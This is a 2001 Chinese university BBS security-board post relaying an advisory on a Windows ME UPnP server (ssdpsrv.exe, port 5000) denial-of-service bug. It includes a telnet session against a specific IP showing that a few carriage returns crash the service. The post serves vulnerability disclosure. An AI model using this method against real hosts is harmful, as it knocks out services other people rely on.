● WindowsME UPnP 服务器拒绝服务漏洞 - 荔园在线 | 深圳大学学生论坛,荔园晨风BBS,深大在线网站

荔园之美，在春之萌芽，在夏之绽放，在秋之收获，在冬之沉淀

发信人: michaelx (水并不是这样灌的), 信区: Security
标题: WindowsME UPnP 服务器拒绝服务漏洞
发信站: 荔园晨风BBS站 (Tue Oct 23 14:46:52 2001), 转信

WindowsME UPnP 服务器拒绝服务漏洞 (MS,缺陷)
涉及程序：
WindowsME UPnP
描述：
WindowsME UPnP 服务器存在拒绝服务漏洞
详细：
发现 WindowsME 上的 UPnP 服务器存在拒绝服务漏洞。该服务器监听于5000端口，c:\
windows\system\ssdpsrv.exe 是运行 UPnP 的程序，它在系统启动时会自动运行
KEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersoin\RunServices
关于 UPnP 相关信息，请参考:
http://support.microsoft.com/support/kb/articles/Q262/4/58.ASP
如果攻击者连接该服务器并发送3到5个回车键将会导致服务器出错并崩溃。
<snip>
bash-2.05$ telnet 165.121.234.217 5000
Trying 165.121.234.217...
Connected to 165.121.234.217.
Escape character is '^]'.
HTTP/1.1 400 Bad Request
Connection closed by foreign host.
bash-2.05$
</snap>
服务器将会有以下错误信息：
Ssdpsrv has caused an error in MSVCRT.DLL.
Ssdpsrv will now close.
If you continue to experience problems,
try restarting your computer.
用户需重启服务器才能恢复正常。

--
M.X的FTP SERVER
有好多好野down.有过百兆的DELPHI编程资料！还有很多其他FTP无的软件。
不信就进来看看罗！
ftp://192.168.28.123
到网络安全版来玩罗，michaelx随时欢迎你！

※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 203.93.19.1]

荔园在线首页友情链接：深圳大学深大招生荔园晨风BBS S-Term软件网络书店